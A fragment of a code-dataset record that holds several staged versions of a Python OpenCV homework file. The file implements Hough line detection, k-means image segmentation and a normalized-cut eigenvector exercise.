cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(\n img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x, y]:\n for index_theta in range(len(theta_array)):\n rho_value = x * np.cos(theta_array[index_theta]\n ) + y * np.sin(theta_array[index_theta])\n index_rho = int(rho_value + rho / 2)\n if index_rho >= rho:\n continue\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta],\n rho_value))\n return detected_lines, accumulator\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_4_a():\n print('Task 4 (a) ...')\n print('-------------------------------------------------')\n D = np.zeros((8, 8))\n W = np.array(([0, 1, 0.2, 1, 0, 0, 0, 0], [1, 0, 0.1, 0, 1, 0, 0, 0], [\n 0.2, 0.1, 0, 1, 0, 1, 0.3, 0], [1, 0, 1, 0, 0, 1, 0, 0], [0, 1, 0, \n 0, 0, 0, 1, 1], [0, 0, 1, 1, 0, 0, 1, 0], [0, 0, 0.3, 0, 1, 1, 0, 1\n ], [0, 0, 0, 0, 1, 0, 1, 0]))\n for i in range(W.shape[0]):\n D[i, i] = np.sum(W[i, :])\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n op = np.matmul(np.matmul(invSqrtD, L), invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1] - 2, :]\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i, i]\n else:\n C2 += D[i, i]\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n minNormCut = (1 / C1 + 1 / C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n\n<mask token>\n",
"step-4": "import numpy as np\nimport cv2 as cv\nimport random\nimport time\nrandom.seed(0)\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(\n img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x, y]:\n for index_theta in range(len(theta_array)):\n rho_value = x * np.cos(theta_array[index_theta]\n ) + y * np.sin(theta_array[index_theta])\n index_rho = int(rho_value + rho / 2)\n if index_rho >= rho:\n continue\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta],\n rho_value))\n return detected_lines, accumulator\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_4_a():\n print('Task 4 (a) ...')\n print('-------------------------------------------------')\n D = np.zeros((8, 8))\n W = np.array(([0, 1, 0.2, 1, 0, 0, 0, 0], [1, 0, 0.1, 0, 1, 0, 0, 0], [\n 0.2, 0.1, 0, 1, 0, 1, 0.3, 0], [1, 0, 1, 0, 0, 1, 0, 0], [0, 1, 0, \n 0, 0, 0, 1, 1], [0, 0, 1, 1, 0, 0, 1, 0], [0, 0, 0.3, 0, 1, 1, 0, 1\n ], [0, 0, 0, 0, 1, 0, 1, 0]))\n for i in range(W.shape[0]):\n D[i, i] = np.sum(W[i, :])\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n op = np.matmul(np.matmul(invSqrtD, L), invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1] - 2, :]\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i, i]\n else:\n C2 += D[i, i]\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n minNormCut = (1 / C1 + 1 / C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n\ntask_4_a()\n",
"step-5": "import numpy as np\nimport cv2 as cv\nimport random\nimport time\n\nrandom.seed(0)\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n##############################################\n# Task 1 ##########################\n##############################################\n\n\ndef task_1_a():\n print(\"Task 1 (a) ...\")\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n edges = cv.Canny( gray_image,50,150)\n #cv.imshow('edges', edges)\n detected_lines = cv.HoughLines(edges,1,np.pi/180,10)\n #print (detected_lines)\n for rho,theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n cv.line(img,(x1,y1),(x2,y2),(0,255,0),1)\n displayImage('1_a Hough transform - detected lines ', img)\n \n\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n #print (rho)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n #print (theta)\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x,y]:\n for index_theta in range(len(theta_array)):\n #theta_value = theta * index_theta \n rho_value = x*np.cos(theta_array[index_theta]) + y*np.sin(theta_array[index_theta])\n # to avoid negative index\n index_rho = int (rho_value + rho/2) \n # to avoid index overflow\n if (index_rho >= rho) : continue\n #print('rhoindex')\n #print (index_rho)\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta], rho_value))\n \n return detected_lines, accumulator\n\n\ndef task_1_b():\n print(\"Task 1 (b) ...\")\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale\n edges = cv.Canny( img_gray,50,150) # detect the edges\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow(\"1_b Accumulator myHoughLines\", accumulator)\n #print (len(detected_lines))\n\n for theta,rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n cv.line(img,(x1,y1),(x2,y2),(0,0,255),2)\n displayImage('1_b Hough transform - own implementation', img)\n \n\n\n##############################################\n# Task 2 ##########################\n##############################################\n\n\ndef task_2():\n print(\"Task 2 ...\")\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale\n edges = cv.Canny( img_gray,50,150,apertureSize = 3) # detect the edges\n theta_res = 1 # set the resolution of theta\n d_res = 1 # set the distance resolution\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage(\"task_2_ accumulator - mean shift\", accumulator)\n #mean_shift(accumulator)\n\n\n##############################################\n# Task 3 ##########################\n##############################################\n\ndef myKmeans(data, k, useDist = False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype = int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n\n # initialize centers using some random points from data\n # ....\n\n # Randomly initialize centers with pixel difference of greater than 0\n\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n\n # Randomly initialize centers of different pixl values. Still buggy\n # start_time = time.time()\n # indices = np.arange(0,data.shape[0]).tolist()\n # for idx in range(centers.shape[0]):\n # if len(indices) > 0:\n # randIdx = random.choice(indices)\n # delIndices = np.unique(np.where((data*255).astype('uint8') == (data[randIdx]*255).astype('uint8'))).tolist()\n # if len(delIndices) > 0:\n # for i in range(len(delIndices)):\n # try:\n # indices.remove(delIndices[i])\n # except ValueError:\n # print('Value not found')\n # # print('Indices removed')\n # else:\n # randIdx = random.choice(range(data.shape[0]))\n # centers[idx] = randIdx \n # end_time = time.time()\n # print('Center no' + str(idx+1) + ' added in ' + str(round(end_time - start_time,5)) + ' seconds')\n\n # To debug uncomment the following lines\n # Sometimes the pixel values of two cluster centroids are too close\n # Therefore, one of the clusters might end up not having any points at all\n # print('Initial centers:\\n' + str(centers))\n # print('-------------------------------------------------')\n # centerVals = data[centers]\n # print('Pixel Values of initial centers:\\n' + str(centerVals))\n # print('-------------------------------------------------')\n\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n # assign each point to the cluster of closest center\n # ...\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist: \n # Since data is a vector, distance is only the difference\n # Normalize the distance to keep it between 0 and 1\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n \n # update clusters' centers and check for convergence\n # ...\n convCounter = 0\n for idx in range(centers.shape[0]):\n if (len(clusters[idx]) > 0):\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis = 0)\n diff = (np.abs(centerVals[idx] - meanVal)*255).astype('uint8')\n if (np.sum(diff) > threshold):\n # indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])\n indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n # if no pixel with the mean value is found, choose another pixel in the cluster\n # and continue\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n\n if convCounter == k:\n convergence = True\n \n iterationNo += 1\n print('iterationNo = ', iterationNo)\n \n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time - start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n\n return index, centers\n\n\ndef task_3_a():\n print(\"Task 3 (a) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n \n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n\n grayVec = np.reshape(grayImg.copy(), (-1,1))\n\n index, centers = myKmeans(grayVec, k)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.reshape(grayImg.shape))\n\n cv.waitKey(0)\n print('=================================================')\n\ndef task_3_b():\n print(\"Task 3 (b) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n\n cv.imshow('Color Image', imgFloat)\n\n K = [2, 4, 6]\n\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n\n imgVec = np.reshape(imgFloat.copy(), (-1,3))\n\n index, centers = myKmeans(imgVec, k)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape(imgFloat.shape))\n \n cv.waitKey(0)\n 